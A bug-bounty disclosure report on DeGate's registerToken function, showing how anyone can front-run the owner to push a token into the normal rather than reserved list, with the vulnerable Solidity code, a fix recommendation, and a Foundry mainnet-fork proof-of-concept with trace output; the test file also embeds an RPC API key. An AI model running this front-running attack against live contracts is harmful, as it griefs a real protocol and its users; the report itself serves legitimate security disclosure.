    • #41741 [SC-Insight] Improper Input Validation in zapInNative Leads to Theft of Residual Funds
    • #41740 [SC-Critical] `accumulatedDeptRewardsYeet` doe not return correct value
    • #41841 [SC-Low] Risk of Reward Loss and Gain Manipulation Due to Untimely Claims and Reward Cap Adjustments
    • #42725 [SC-Critical] startUnstake() Reduces Total Supply, but StakingToken Balance in contract Remains Constant, Leading to Inflated accumulatedDeptRewardsYeet()
    • #41895 [SC-Medium] Potential loss of token0, token1 in the MoneyBrinter contract
    • #41788 [SC-Medium]Yield theft because of compound function design
    • #42598 [SC-High] When claiming rewards from `StakeV2` left-over debt is sent to `StakeV2` instead of the user
    • #41695 [SC-Critical] StakeV2 leaks user tokens as rewards and eventually will become insolvent.
Powered by GitBook
On this page
  • Description
  • Impact
  • Risk Breakdown
  • Recommendation
  • References
  • Proof of concept

Was this helpful?

  1. DeGate

25886 - [SC - Insight] registerToken can be front-run causing token ca...

Previous25885 - [SC - Insight] Prevent the operator from submitting blocks to LNext25892 - [SC - Insight] A malicious user can DoS force withdraw request...

Last updated 8 months ago

Was this helpful?

Submitted on Nov 20th 2023 at 22:35:43 UTC by @yttriumzz for

Report ID: #25886

Report type: Smart Contract

Report severity: Insight

Target: https://etherscan.io/address/0x9C07A72177c5A05410cA338823e790876E79D73B#code

Impacts:

  • Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)

Description

    function registerToken(
        ExchangeData.State storage S,
        address tokenAddress,
        bool isOwnerRegister
        )
        public
        returns (uint32 tokenID)
    {
        require(!S.isInWithdrawalMode(), "INVALID_MODE");
        require(S.tokenToTokenId[tokenAddress] == 0, "TOKEN_ALREADY_EXIST");

        if (isOwnerRegister) {
            require(S.reservedTokens.length < ExchangeData.MAX_NUM_RESERVED_TOKENS, "TOKEN_REGISTRY_FULL");
        } else {
            require(S.normalTokens.length < ExchangeData.MAX_NUM_NORMAL_TOKENS, "TOKEN_REGISTRY_FULL");
        }

        // Check if the deposit contract supports the new token
        if (S.depositContract != IDepositContract(0)) {
            require(S.depositContract.isTokenSupported(tokenAddress), "UNSUPPORTED_TOKEN");
        }

        // Assign a tokenID and store the token
        ExchangeData.Token memory token = ExchangeData.Token(tokenAddress);

        if (isOwnerRegister) {
            tokenID = uint32(S.reservedTokens.length);
            S.reservedTokens.push(token);
        } else {
            tokenID = uint32(S.normalTokens.length.add(ExchangeData.MAX_NUM_RESERVED_TOKENS));
            S.normalTokens.push(token);
        }
        S.tokenToTokenId[tokenAddress] = tokenID + 1;
        S.tokenIdToToken[tokenID] = tokenAddress;

        S.tokenIdToDepositBalance[tokenID] = 0;

        emit TokenRegistered(tokenAddress, tokenID);
    }

Everyone can call registerToken to register a token. If it is called by the owner, the token is added to reservedTokens, otherwise it is added to normalTokens. Once a token is added to reservedTokens or normalTokens, it cannot be added again.

Therefore, the attacker can add the token that the Owner expects to be added to reservedTokens to normalTokens first.

The attack process is as follows:

  1. Owner call registerToken to register TokenA

  2. The attacker observes that mempool recognizes the Owner's transaction, initiates a transaction with a higher gas price, and front-run executes registerToken to register TokenA.

Impact

https://docs.degate.com/v/product_en/concepts/economic-security

Please refer to the above document for the difference between reservedTokens and normalTokens. The owner's inability to add tokens to reservedTokens may damage the stable run of the protocol.

Risk Breakdown

Difficulty to Exploit: Easy

Recommendation

Owner can convert normalTokens into reservedTokens, which can prevent this BUG. And it allows the Owner to have the ability to add reservedTokens in the future. (For example, if a Token becomes popular, consider upgrading it from normalTokens to reservedTokens).

References

Proof of concept

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-std/Test.sol";

// main fork url
string constant MAINNET_RPC_URL = "https://eth-mainnet.g.alchemy.com/v2/TrnSBL14bW3BaXavojgbw69L0ZK2lbZ_";
uint256 constant MAINNET_BLOCK_NUMBER = 18614000;

// contract address
address constant ADDRESS_CONTRACT_ExchangeV3 = address(0x9C07A72177c5A05410cA338823e790876E79D73B);
address constant ADDRESS_CONTRACT_WETH = address(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);

// user address
address constant ADDRESS_USER_ExchangeV3Owner = address(0x9b93e47b7F61ad1358Bd47Cd01206708E85AE5eD);
address constant ADDRESS_USER_Attacker = address(0xAACE);

interface IExchangeV3 {
    function registerToken(address tokenAddress) external returns (uint32);
}

contract YttriumzzDemo is Test {
    IExchangeV3 exchangeV3;

    function setUp() public {
        vm.selectFork(vm.createFork(MAINNET_RPC_URL, MAINNET_BLOCK_NUMBER));

        exchangeV3 = IExchangeV3(ADDRESS_CONTRACT_ExchangeV3);
    }

    function testYttriumzzDemo() public {
        // This POC assumes this scenario:
        //   The Owner wants to add WETH to the `reservedTokens` list and call the `registerToken` function.
        //   The Attacker checked that the mempool contained this transaction and frount-run call the `registerToken` function,
        //   causing WETH to be added to the `normalTokens` list.
        // 
        // In order to simplify the POC:
        //   The Attacker is executed first, instead of providing a high gas price to let the node execute in advance.
        //
        // Results:
        //   WETH is added to the `normalTokens` list, and the Owner's transaction execution fails.

        vm.startPrank(ADDRESS_USER_Attacker);
        uint32 tokenID = exchangeV3.registerToken(ADDRESS_CONTRACT_WETH);
        vm.stopPrank();

        vm.startPrank(ADDRESS_USER_ExchangeV3Owner);
        vm.expectRevert("TOKEN_ALREADY_EXIST");
        exchangeV3.registerToken(ADDRESS_CONTRACT_WETH);
        vm.stopPrank();

        assertTrue(tokenID > 32);
        console.log("tokenID: %s", tokenID);
    }
}

Output:

$ forge test --match-test testYttriumzzDemo -vvvv
[⠰] Compiling...
[⠑] Compiling 1 files with 0.8.19
[⠘] Solc 0.8.19 finished in 1.22s
Compiler run successful!

Running 1 test for test/YttriumzzDemo.sol:YttriumzzDemo
[PASS] testYttriumzzDemo() (gas: 138975)
Logs:
  tokenID: 60

Traces:
  [138975] YttriumzzDemo::testYttriumzzDemo()
    ├─ [0] VM::startPrank(0x000000000000000000000000000000000000AAce)
    │   └─ ← ()
    ├─ [102352] 0x9C07A72177c5A05410cA338823e790876E79D73B::registerToken(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   ├─ [97353] 0xc56C1dfE64D21A345E3A3C715FFcA1c6450b964b::registerToken(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   ├─ [89300] 0x2Bf7021a3Aa041e1a8a5082DB720d0202C70A3aE::5ac78334(0000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   ├─ [5341] 0x54D7aE423Edb07282645e740C046B9373970a168::isTokenSupported(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   ├─ [321] 0x8CCc06C4C3B2b06616EeE1B62F558f5b9C08f973::isTokenSupported(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   │   └─ ← 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   └─ ← 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ emit TokenRegistered(: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, : 60)
    │   │   │   └─ ← 0x000000000000000000000000000000000000000000000000000000000000003c
    │   │   └─ ← 0x000000000000000000000000000000000000000000000000000000000000003c
    │   └─ ← 0x000000000000000000000000000000000000000000000000000000000000003c
    ├─ [0] VM::stopPrank()
    │   └─ ← ()
    ├─ [0] VM::startPrank(0x9b93e47b7F61ad1358Bd47Cd01206708E85AE5eD)
    │   └─ ← ()
    ├─ [0] VM::expectRevert(TOKEN_ALREADY_EXIST)
    │   └─ ← ()
    ├─ [22427] 0x9C07A72177c5A05410cA338823e790876E79D73B::registerToken(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   ├─ [21912] 0xc56C1dfE64D21A345E3A3C715FFcA1c6450b964b::registerToken(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   ├─ [842] 0x2Bf7021a3Aa041e1a8a5082DB720d0202C70A3aE::5ac78334(0000000000000000000000000000000000000000000000000000000000000003000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000000000000000000000000000000000000000000001) [delegatecall]
    │   │   │   └─ ← 0x08c379a000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000013544f4b454e5f414c52454144595f455849535400000000000000000000000000
    │   │   └─ ← "TOKEN_ALREADY_EXIST"
    │   └─ ← "TOKEN_ALREADY_EXIST"
    ├─ [0] VM::stopPrank()
    │   └─ ← ()
    ├─ [0] console::9710a9d0(0000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000003c000000000000000000000000000000000000000000000000000000000000000b746f6b656e49443a202573000000000000000000000000000000000000000000) [staticcall]
    │   └─ ← ()
    └─ ← ()

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.22s

Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)
Boost | DeGate